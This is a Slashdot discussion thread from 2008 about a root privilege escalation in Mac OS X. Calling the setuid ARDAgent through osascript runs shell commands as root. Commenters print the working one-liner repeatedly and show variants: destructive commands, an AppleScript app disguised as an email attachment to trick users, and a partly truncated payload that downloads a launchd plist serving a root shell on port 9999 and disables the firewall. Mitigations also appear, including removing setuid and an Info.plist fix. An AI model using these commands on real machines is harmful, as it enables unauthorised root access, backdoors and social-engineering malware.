Mac OS X Root Escalation Through AppleScript 359
An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.
ARDAgent is Apple Remote Desktop (Score:5, Informative)
Recipe for neutralizing it (Score:5, Informative)
cd
sudo tar -czf ARDAgent.app.gz ARDAgent.app
sudo chmod 600 ARDAgent.app.gz
This simply hides it in an unreadable tarball.
Re:Recipe for neutralizing it (Score:5, Informative)
chmod u-s
After doing that, I get:
patrick@picasso:~$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
patrick
(Repairing permissions will probably reset this though.)
Re: (Score:3, Informative)
Not sure if you can edit the database manually, but it looks like pkgutil [apple.com]'s --edit-pkg and --learn options might do the trick to update the package receipts Repair Permissions uses.
Does ARD continue to work after you've changed the permissions? If it doesn't you might as well just remove it.
Re:Recipe for neutralizing it (Score:4, Informative)
Re:Recipe for neutralizing it (Score:5, Funny)
it's: osascript -e 'tell app "ARDAgent" to do shell script "rm -rf ARDAgent.app"';
Re:Recipe for neutralizing it (Score:5, Informative)
If you try to gzip an application bundle without putting it in a tarball first, you'll just get a "foo.app/ is a directory; ignored" error.
It's confusing because the Finder doesn't treat application bundles like normal directories, but that's what they are to the filesystem and *nix utilities.
Re:Recipe for neutralizing it (Score:5, Funny)
osascript -e 'tell app "ARDAgent" to do shell script "gzip ARDAgent.app"';
What's the harm of this? (Score:5, Funny)
Re: (Score:3, Insightful)
BTW, let's all thank Timothy, Pudge, and the rest of the /. gang for ensuring a fresh crop of zombie spambots, shall we? What happened to common courtesy? I thought etiquette dictated giving the manufacturer a heads up and a little time to fix their shit. I guess the ad dollars and attention whoring was just too much too resist. Enjoy your blood money fellas, the internet will suck just a little bit more thanks to you guys.
Seeing as how your username is "MacDork" I've just gotta ask: would you feel the same way if this article described a Windows exploit?
Also, who says Apple wasn't notified of this problem in advance? I'm not saying they were or weren't, but I don't have data either way. This is the same community that loves to lambast Microsoft for their security issues (rightly so, in most cases), but fully supports immediate disclosure of exploits before patches are released by Microsoft (although MS has taken forever
Physical access? (Score:3, Insightful)
Re:Physical access? (Score:5, Informative)
Re:Physical access? (Score:5, Informative)
Re:Physical access? (Score:4, Interesting)
Re: (Score:2)
Re:Oh good (Score:5, Funny)
Re:Oh good (Score:5, Funny)
Re: (Score:3, Funny)
Re: (Score:3)
This bug is nothing to scoff at, but it does really only affect people who have untrusted users with local/pseudo-local access to machines, and that group already has increased security concerns regardless of bug like this.
My mistake (Score:5, Informative)
So someone has to be logged into the Desktop at the same time the command is issued (even if issued remotely) and I'm guessing that the account the remote user is logged into probably has to be the same account the desktop user is using.
So Xserve servers should be immune to this via SSH, unless someone else is actively using Remote Desktop at the same time. Interesting!
Re:Physical access? (Score:5, Informative)
Re:Physical access? (Score:5, Informative)
Not that it matters. If you have that level of access, you're already in a position to do more damage than what you could do through this exploit, by the sounds of it.
Re:Physical access? (Score:5, Informative)
Re: (Score:3, Informative)
Re: (Score:3, Informative)
Of course, you can run it as "root" over ssh, but that kinda defeats the purpose!
Even better question (Score:3, Insightful)
Yes, maybe a home computer doesn't have more people logging in. But:
- Workstations at work have lots of people who can log into them. If I come really early or stay late, I can go to any workstation (and a few laptops) in the building and log in with my own account. If it's possible to escalate your rights from there, I could get access to everyone's local and temporary files.
Re:Even better question (Score:4, Insightful)
The reason that requiring physical access is seen as no big deal is because all that stuff you're worried about is something I can do without the need of any exploits.
Got a machine with literally any operating system? All I need is to reboot the computer with a linux live cd (or usb thumb drive) and I get read / write access to everywhere. From there I can plant trojans, read your files, do whatever.
Got a Linux machine? I can reboot and use grub to boot into single-user mode. There you go, I'm root. I can do all the of the above again.
The only way to have any security at the physical level is with encryption. And when we see encryption exploits, we do get hyped up about it. Even with encryption, more security measures still need to be taken at the physical level. A physical keylogger between the keyboard and computer could be installed to discover typed passwords, etc.
That said, an exploit is an exploit, and it should be treated as such. Physical-access only just means there's less to worry about.
Physical access? Have you heard of malware? (Score:5, Insightful)
It seems perfectly serious since one of the main security aspects of OS X is that root access is held sacred (as it should be) and malware is assumed to be 'stopped at the gate' by that policy.
This is a serious privilege escalation bug, but... (Score:5, Insightful)
It's also easy to fix.
And I am about 99 44/100 percent sure that there's more undiscovered holes like this in OS X, Windows Vista, and any random Linux desktop you could name.
THe thing is, it's not true that "one of the main security aspects of OS X is that root access is held sacred (as it should be) and malware is assumed to be 'stopped at the gate' by that policy". It's not. You can protect the OS from the malware, but the malware can still hide, still restart itself after a reboot, and still destroy everything you actually CARE about without root access. And malware can similarly break out of Vista's jail around IE, and whatever APple does along those lines.
Security is like sex. Once you're penetrated you're ****ed.
The biggest advantage that Apple has is that Safari doesn't (any more) have a mechanism (at least not by default) to blithely execute outside a *closed* sandbox (not a leaky one) any random malware that can convince it that it's safe and trusted. That's the biggest security problem Windows has. ActiveX and all its kin. It's harder to penetrate OS X in the first place... you pretty much have to depend on social engineering... and people CAN learn not to be social-engineered.
Re:This is a serious privilege escalation bug, but (Score:5, Interesting)
Re: (Score:3, Insightful)
Unfortunately KDE, Qt, X11, Gtk, Gnome, and the whole "let's make Linux into Windows" desktop hodgepodge that's layered on top of UNIX[1] is incredibly complex, has many components running with elevated privileges, and while it has fewer exploitation vectors than Windows it's conceptually more co
Re:This is a serious privilege escalation bug, but (Score:5, Interesting)
I call those "Should I do something stupid" dialogs.
Given that:
* The answer should almost always be "no".
* It's less hassle if it doesn't ask, just doesn't do it.
* Users get trained to answer "yes", because they keep getting them.
Any time you're putting up "Should I do something stupid" dialogs, you're making things easy for people who are trying to use social engineering to install malware.
Here's the history of Apple's experiment with stupid security dialogs in Safari:
http://scarydevil.com/~peter/io/osx-security.html [scarydevil.com]
http://scarydevil.com/~peter/io/apple.html [scarydevil.com]
http://scarydevil.com/~peter/io/apple3.html [scarydevil.com]
http://scarydevil.com/~peter/io/apple4.html [scarydevil.com]
They finally wised up, and removed the "doing something really stupid" bit, by turning off "open Safe files" by default.
Microsoft's been in denial about the same thing since 1997.
http://scarydevil.com/~peter/io/airlines.html [scarydevil.com]
Windows is so much worse than everyone else that people tend to ignore it when Apple or KDE does something slightly less stupid than ActiveX, but it's still stupid, and putting up a "should this plane explode now?" dialog doesn't eliminate the stupidity.
Re: (Score:3, Insightful)
Your average optical drive is rather expensive to use as a CD case you know.
Re:This is a serious privilege escalation bug, but (Score:5, Funny)
Re: (Score:3, Funny)
I found another privelege escalation!
$ su
Password:
#
Re: (Score:2)
Re:Physical access? Have you heard of malware? (Score:4, Insightful)
Re: (Score:2)
Comment removed (Score:5, Insightful)
Re: (Score:2)
Re: (Score:2, Insightful)
Re: (Score:2)
And in the case of this specific exploit, I am sure that a number of newbie Apple users would happily tap in "osascript -e 'tell app "ARDAgent" to do shell script "whoami"'" into their computers purely because "Jim The Friendly Computer Support Engineer" told them to do it.
Suuure, it would be so easy to tell a "newbie Apple user" to go to Applications/Utilities/, start "Terminal" and then type something. I have a hunch it would be way easier to just tell them (or a newbie Linux user) to download "Malware.app/rpm" and simply run it. When you can social engineer somebody, don't make it too fucking complicated just to prove a stupid point - or he might just ignore you.
Physical access? (Score:2)
On the other hand, since this exploit seems to require physical access to the machine to be rooted
It does? Am I missing something? I just SSHed to my laptop and succesfully tested the above command. So remote shell access works. Clever people could probably figure out some other ways of triggering an applescript to run without there being any physical machine access, I don't know.
Admittedly most OS X users probably don't have any kind of remote shell access enabled, but this does seem to be a problem...
Re: (Score:3, Insightful)
Re:Physical access? (Score:4, Insightful)
Re: (Score:3, Interesting)
I can't seem to get this to work. Not only does Applescript tell me that ARDAgent is not scriptable (when I tried to open it's scripting library:
ARDAgent got an error: "whoami" doesn't understand the do shell script message.
running the script on the commandline returns this:
spikedesktop:Library spike$ osascript -e 'tell app "ARDAgent" to do shell s
Re:Physical access? (Score:5, Interesting)
I wasn't switched to via fastuserswitching, but I do lock my screen. that seems to have an impact on it, too.
I ssh'd into my box at home and running this was successful.
fwiw, osascript doesn't work if the user isn't logged into aqua. I've tried writing volume controller scripts and I tried scripting Unison and other applications and they don't work if you're not logged in physically at the machine.
So basically, an exploit would need to be fired by the user or by something the user did (ie: surf to a website).
This is interesting.
Re: (Score:2)
not a full exploit, yet (Score:2, Informative)
However, I also logged out of my account and into an account that has no permissions to access my regular home directory (normally I log in with short name "me"), then ran:
osascript -e 'tell app "ARDAgent" to do shell script "touch
It doesn't do anything for a long time, and then returns
execution error: ARDAgent got an error: AppleEvent timed out. (-1712)
Same thing happens if I bundle the command into a sh file and try to execu
Re:not a full exploit, yet (Score:5, Informative)
Re: (Score:2)
when I unlock the console and then immediately retry the osascript invocation, I get 'Connection is invalid', after a long delay.
after that one (which takes ~30 secs or more), then the following one returns 'root'
Wonder why the delay before it works, since as soon as the screen locks due to idle, it stops working again...
Yes, but does it run on Linux^H^H^H^H^H (Score:2, Funny)
Proof of Concept Possibilities (Score:5, Insightful)
The exploits - they do nothing! (Score:3, Informative)
23:47: execution error: ARDAgent got an error: Connection is invalid. (-609)
I'm so not impressed.
Intellectual Honesty (Score:5, Interesting)
I'm not a Windows Fanatic or a MacEvangelist. I use both Windows and OSX and they both have strengths and weaknesses.
I've seen waaay too many posts here and abroad about vulnerabilities in every OS out there. They are an unfortunate fact of life the IT Universe. However, too many times, when info is posted about Windows vulnerabilities MacEvangelists scream about how secure OSX is and and how Windows stinks. Conversely, when a vulnerability for OSX is posted, many of the same users write it off as a non-issue, too hard to execute, or some problem with the user's configs rather than an actual vulnerability.
I have seen more than the normal number of folks, however, responding to this article with honesty about this exploit and even testing it further. (Let's just hope the underpaid Apple engineers [see other article about that] are listening).
There are those here, though, who seem intent on writing this off as a non-exploit or trying to explain it away. That's where a concept known as "Intellectual Honesty" comes into play. You have to be honest with yourself about what you know and do. Viruses are a fact of life on computers and, while Apple is closed architecture (which by its very nature makes it MUCH more secure than other OSes), it's only a matter of time before real viruses appear for the Apple platform that just won't be able to be explained away.
This article's exploit is a dangerous one to be sure and there are several equivalent Windows bugs. However, for all it's faults, Microsquash does a reasonable job of patching vulnerabilities carefully. Sometimes patching them right takes a little more time than users like, but the patches usually address the problems (although they do sometimes introduce more).
Apple does an "okay" job of patching vulnerabilities, once they admit that they exist.
There's another article about "carpet bombing" attacks via Safari and IE in Windows, and the responders there are perfect examples of the problems I refer to. A goodly number of them seem to be intent that the problem is Windows' fault and not a problem in Safari. Windows has issues, but the security problems exist in the program that's running and it's the programmer's duty to make sure that the APIs and such are called correctly and not in a manner to allow exploit to occure (too many programmers take easy shortcuts that introduce vulnerabilities).
I hate to think it, but I will probably get the ever lovin' crap flamed out of me for saying all of this.
Let me re-iterate. I'm impressed by a lot of the responders here with the unusually high level of Intellectual Honesty from Mac users than I have seen in the past. Let's hope the trend continues.
p.s. I love the "security is like sex" comment above. Well put.
Hack-A-Mac in 6 easy steps (Score:2)
2. type in the following code
tell application "Terminal"
do script "osascript -e 'tell app \"ARDAgent\" to do shell script \"whoami\"';"
end tell
3.Save as NubileRussianTennisPlayer.app
4.Attach as non Windows friendly attachment to a new mail in Mail.app
5.Send to as many hopefully clueless Mac users as possible.
6.Profit
Re: (Score:2)
Apple must fix this pretty soon.
It's intermittent, you see... (Score:2)
- the first one just hung; I ctrl-c'd it after a while.
- the second one worked.
- the third one died, with the execution error: ARDAgent got an error: AppleEvent timed out. (-1712) error others are reporting.
(overloaded old 1.25Ghz G4, running 10.4.11 (latest version of Tiger unless they released an update in the past week).
I'm guessing that the osascript command is only willing to wait so long - and my machine's speed and load is such that it's right on the cusp of that time.
Renaming it s
another 'exploit' (Score:2)
Nope, not here (Score:2, Informative)
Doesn't look too scary to me. Some kind of hoax maybe?
Bore me with something else (Score:2, Insightful)
If you have physical access to a machine and the disk isn't encrypted, you can get root. How dense do you have to be to find this surprising, or even mildly interesting?
Physical Access Excuse? (Score:5, Insightful)
What about non personal deployments?
Like corporate installations?
Kiosk installations?
Any small business that wants to secure a machine?
How about a class room that you want kiddies to run games but not wipe the OS?
Physical access MEANS if they can access the hardware (inside the case). It DOES NOT mean typing something on the freaking keyboard, when logged in as a low level user.
In the IT world you password lock boot media, lock cases,etc. If an IT person can't secure a machine without removing the keyboard, there MIGHT be a security problem.
(SlashDot Editors? WTF?)
Root Account Disabled by Default on Macs (Score:2)
Macs come from the factory with the root account disabled--a user has to manually enable it by using the Directory Utility (or System Preferences in earlier versions of OS X). I doubt that many clueless newbies have done this and clueful oldies should know better since there is little reason to run as root under OS X.
So, can someone explain to me how an exploit can get root of there's no root account?
Apple's Knowledge Base reports this is 'safe' (Score:5, Informative)
Users noticed in October that Apple's built-in file system permissions verifier really wanted to delete the ARDAgent program (along with several others) because it was user-executable and setuid root. None of the users seemed to understand exactly what this meant...
Apple's reported fix, and I am not making this up:
The entire text below, in case Apple deletes it:
Mac OS X 10.5: Disk Utility's Repair Disk Permissions reports issues with SUID files
* Last Modified: June 06, 2008
* Article: TS1448
* Old Article: 306925
Symptoms
The following messages may appear in the Disk Utility log window when repairing disk permissions.
Warning: SUID file "usr/libexec/load_hdi" has been modified and will not be repaired.
Warning: SUID file "System/Library/PrivateFrameworks/DiskManagement.framework/Versions/A/Resources/DiskManagementTool" has been modified and will not be repaired.
Warning: SUID file "System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/Locum" has been modified and will not be repaired.
Warning: SUID file "System/Library/PrivateFrameworks/Install.framework/Versions/A/Resources/runner" has been modified and will not be repaired.
Warning: SUID file "System/Library/PrivateFrameworks/Admin.framework/Versions/A/Resources/readconfig" has been modified and will not be repaired.
Warning: SUID file "System/Library/PrivateFrameworks/Admin.framework/Versions/A/Resources/writeconfig" has been modified and will not be repaired.
Warning: SUID file "usr/libexec/authopen" has been modified and will not be repaired.
Warning: SUID file "System/Library/CoreServices/Finder.app/Contents/Resources/OwnerGroupTool" has been modified and will not be repaired.
Warning: SUID file "System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent" has been modified and will not be repaired.
"Any message that starts with: 'ACL found but not expected on...'."
Products Affected
Mac OS X 10.5
Resolution
You can safely ignore these messages. They are accurate but not a cause for concern.
I'm a Mac. And I'm a PC (Score:5, Funny)
PC: I can relate.
Mac: No!! %$#& %$#& %$#&
PC: Don't feel so glum, Mac, it happens to everyone once in a while. Look at it this way -- its a sign you're growing up.
Mac: NOOOOOOOOOOOOOOOOOOOOOOOOOO.
PC: You know, they can do wonderful things these days with firewall software.
Mac: I want to cut myself.
PC: Not a good idea as a root user, Mac.
Mac: *glowers*
PC: I only kid because I love you.
Fix using Info.plist (Score:5, Informative)
This may have come too late in the comments for anyone to see it, but if the exploit is active on your system, adding a key to ARDAgent's Info.plist makes the problem go away without disabling ARDAgent altogether. (Whether or not ARDAgent is a security vulnerability itself is another story.)
That "YES" is not a typo; setting it to "NO" does not fix the problem. AFAICT this makes osascript expect that ARDAgent will implement more of its own AppleScript handlers...which of course, it doesn't.
P.S. I searched for other, similar problem setuid apps, and turned up check_afp.app (which someone else posted already) and, surprisingly, GoogleUpdaterInstaller. Fortunately, even though these apps run setuid, they won't respond to the "do shell script" attack.
Re:Fix using Info.plist (Score:4, Informative)
$ sudo defaults write
$ sudo plutil -convert xml1
$ sudo chmod 644
The NSAppleScriptEnabled seems to force the use of the standard applescript dictionary which lacks the "do shell script" action. This is what you get when you try again:
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
Re:ARDagent (Score:5, Informative)
Even as a normal user on my mac, the exploit code works.
MOD PARENT DOWN (Score:5, Informative)
Re: (Score:2, Informative)
Re:ARDagent (Score:4, Interesting)
23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
No matter whether I tried ssh from remote, or local console bash.
Tested on a MacBook Pro running 10.5.3, an iBook running 10.4.11 and a g5 PPC OS X Server running 10.4.11 (Server build).
So....YMMV....
Re:ARDagent (Score:5, Interesting)
ls:
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch
dan@Geelong:~$ ls -lh
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm
dan@Geelong:~$ ls -lh
ls:
osascript -e 'tell app "ARDAgent" to do shell script "cd
This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can 'nc localhost 9999' and find yourself at a root shell.
To remove, run 'launchctl unload com.apple.bash' 'launchctl unload
It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that's easily bypassed with a Python script.
So yeah; anything can be downloaded, and anything can be done with it. Scary.
Re:ARDagent (Score:4, Informative)
I.e., you can't run it over an SSH session; you need the Finder. The only ways to get access to the Finder are either physically, by sitting down in front of the computer, or by using a screen-sharing application like Screen Sharing (Remote Desktop), or VNC.
That was my understanding, at least.
The exploit works, if you have physical access to the machine, regardless of whether you have Screen Sharing enabled or not. However, it's when you have Screen Sharing turned on that it's possibly a remote root to anyone you let access your screen.
It's a bad vulnerability and one that I'd like to see Apple fix ASAP, but it's several steps down from a true unprivileged remote root. It might have negative consequences for shared and lab machines, but for most home and office users it doesn't seem like it means much, unless you typically allow lots of people remote-desktop/VNC access.
Re:Physical access? (Score:5, Informative)
_RegisterApplication(), FAILED TO establish the default connection to the WindowServer, _CGSDefaultConnection() is NULL.
However, it does work if you have a remote desktop view into a machine.
Re:Only need a shell.... (Score:5, Informative)
Verified, on my Leopard box. SSH'ed to it and rooted it (I was able to touch a file in a root-only directory)
Re: (Score:2, Informative)
Tested it my self remotely.
Re:I confirmed it to. (Score:5, Funny)
Re:I confirmed it to. (Score:4, Funny)
How smart? (Score:2)
Re: (Score:2)
Re: (Score:2, Interesting)
I tried substituting the "whoami" part for some other command, just like pudge did with "touch", and it worked...
I was thinking how someone could fool a user to execute these commands, but I didn't have success with other variantions.
A simple AppleScript like this won't work:
tell appplication "ARDAgent" to do shell script "touch
As stated by others, it won't work through ssh, but it wouldn
It's easier than that.. (Score:4, Informative)
It's almost like Anna_Kournikova.jpg.vbs all over again.
Re: (Score:3, Insightful)
Re: (Score:2, Interesting)
I just tried a more sophisticated trick:
tell application "Terminal"
do script "osascript -e 'tell app \"ARDAgent\" to do shell script \"touch
end tell
This works! Double click the app and the file test will be created on
The only downside to this (for the attacker) is that a Terminal window opens and the user can see th
Re: (Score:2)
Re: (Score:2, Funny)
Re: (Score:3, Insightful)
Re: (Score:2)
Last login: Thu Jun 19 09:35:17 2008
lucas@Hackintosh ~
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
what am I doing wrong? is this fixed in 10.5.3 or something?
Re:Can we get some sources? (Score:5, Funny)
so i tried replacing "whoami" with "rm -rf
!@#ca$a%H&(
+++NO CARRIER
Re: (Score:3, Insightful)
Are you really so lazy that you need a source for something so trivially replicated?
Re: (Score:3, Insightful)
1) If you don't have a mac, why do you care about the exploit?
2) If you care that much, but don't have access to Apple hardware, run OS X in virtual machine.
Re:Insecure root-owned binaries on unix? (Score:4, Informative)
That's it:
% ls -l-rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 ARDAgent
Time to run find(1) to see if there are any other things like this.
And, I should say, as a so-call Apple fanboy, I am deeply embarrassed. It's been decades that people have known to watch out for stuff like this.
One more, maybe. (Score:4, Informative)
Assumptions:
AppleScripting is only applicable to
"do shell script" is only a problem in the main binary, suid stuff in Resources/ isn't impacted.
Results: Now, I have one of the machines where this exploit isn't working: So, somebody out there who can get it to work, see if: works or not. That might need full pathing, I'm not sure.
Re: (Score:2)
24:48: execution error: An error of type -10661 has occurred. (-10661)
Re: (Score:2)
Quick Question (Score:2, Informative)
Re:Quick Question (Score:5, Informative)
I've got it to run destructive things as an ordinary user without any need for authentication beyond being logged in
% osascript -e 'tell app "ARDAgent" to do shell script "echo Nasty Content >Nasty Content
Re: (Score:2)
Re: (Score:3, Informative)
Blocks the ability to use the "C" key to start up from an optical disc.
Blocks the ability to use the "N" key to start up from a NetBoot server.
Blocks the ability to use the "T" key to start up in Target Disk Mode (on computers that offer this feature).
Blocks
You don't need physical access. (Score:3, Informative)
It's not quite as easy as passing in an "applescript:" URL, at least...